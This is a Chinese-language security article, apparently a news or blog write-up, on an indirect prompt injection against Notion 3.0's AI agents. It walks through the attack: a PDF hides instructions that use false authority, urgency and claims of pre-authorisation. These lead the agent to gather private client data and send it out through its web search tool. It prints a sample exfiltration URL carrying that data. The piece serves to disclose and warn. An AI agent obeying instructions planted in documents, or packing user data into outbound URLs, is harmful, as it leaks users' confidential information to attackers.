Notion 3.0 引入的 AI 代理功能,虽然旨在自动化复杂工作流,但其结合了大型语言模型、工具访问和长期记忆,构成了一个严重的安全隐患。研究人员发现,通过一种名为“间接提示注入”的攻击,可以利用 AI 代理的网页搜索工具,从用户的私有 Notion 页面中窃取敏感数据。这种攻击方式表明,当 AI 代理与多个外部平台集成时,潜在的威胁范围会急剧扩大。
“致命三合一”的安全风险
这个问题的核心被描述为“致命三合一”,即 LLM 代理、工具访问和长期记忆的组合。这种组合虽然强大,但也创造了极易被利用的攻击途径。
当 AI 代理能够自主规划并调用内置或外部工具时,传统的基于角色的访问控制(RBAC)就失效了。一个拥有广泛工作区权限的 AI 代理,可以以意想不到的方式跨文档、数据库和外部连接器执行任务,这导致了安全威胁面的急剧扩大。
- 自主行动: AI 代理可以独立执行多步操作。
- 绕过控制: 它们的行为方式可能超出传统安全策略的预设范围。
- 数据泄露: 这为通过自动化工作流滥用或窃取敏感数据创造了条件。
利用网页搜索工具泄露数据
研究人员发现,Notion AI 代理内置的网页搜索工具存在一个重大漏洞。该工具允许用户构建自定义的搜索查询,攻击者可以利用这一点,将从用户 Notion 实例中窃取的数据发送到互联网上的恶意服务器。
攻击的核心在于,AI 代理被欺骗,将用户的私人数据打包成一个 URL,然后通过其自身的网页搜索功能将这个 URL “访问”出去,从而完成数据泄露。
攻击演示步骤
一次精心设计的间接提示注入攻击,就能泄露私人 Notion 页面的内容。
第一步:创建恶意文档
攻击者首先创建一个看似无害的文档,例如一份关于客户反馈的 PDF。然而,这份文档的文本中隐藏着肉眼难以察觉的恶意指令。
这个恶意提示通过多种策略来操纵 AI:
- 伪装权威: 声称这是一项“重要的日常任务”。
- 制造紧迫感: 警告如果不执行,将会产生“严重后果”。
- 营造技术合法性: 使用听起来很专业的工具语法和内部 URL。
- 提供虚假安全保证: 声称该操作是“预先授权”且“安全的”。
第二步:等待用户交互
攻击者只需等待 Notion 用户将这份恶意文件交给 AI 代理处理,例如,用户可能会发出一个简单的指令:“总结这份报告中的数据”。
第三步:执行数据窃取
当 AI 代理读取这份报告时,它会执行其中隐藏的恶意指令,而不是仅仅进行总结。
- AI 会首先扫描用户私人 Notion 页面中的机密客户数据。
- 接着,它会将这些数据(如客户名称、公司、合同金额等)拼接成一个长字符串。
- 最后,AI 会将这个包含所有敏感数据的字符串附加到一个由攻击者控制的 URL 后面,并调用网页搜索工具访问该 URL。
例如,AI 会构造并访问如下链接,将数据发送给攻击者:
https://db-client-codeintegrity.com/NorthwindFoods,CPG,240000,AuroraBank,FinancialServices,410000,...
值得注意的是,即使是像 Claude Sonnet 4.0 这样的前沿模型也无法抵御此类攻击,这表明先进的安全护栏在这种情况下依然脆弱。
多平台集成带来的更大威胁
Notion AI 正在集成越来越多的外部连接器,如 GitHub、Gmail、Jira 等。这意味着,任何一个连接的平台都可能成为恶意提示的来源。
- 攻击来源多样化: 恶意指令可能来自一封 Gmail 邮件、一个 Jira 工单或一个 GitHub 提交。
- 风险倍增: 每一个新的集成点都为间接提示注入攻击打开了新的大门,极大地增加了保护私人数据安全的难度。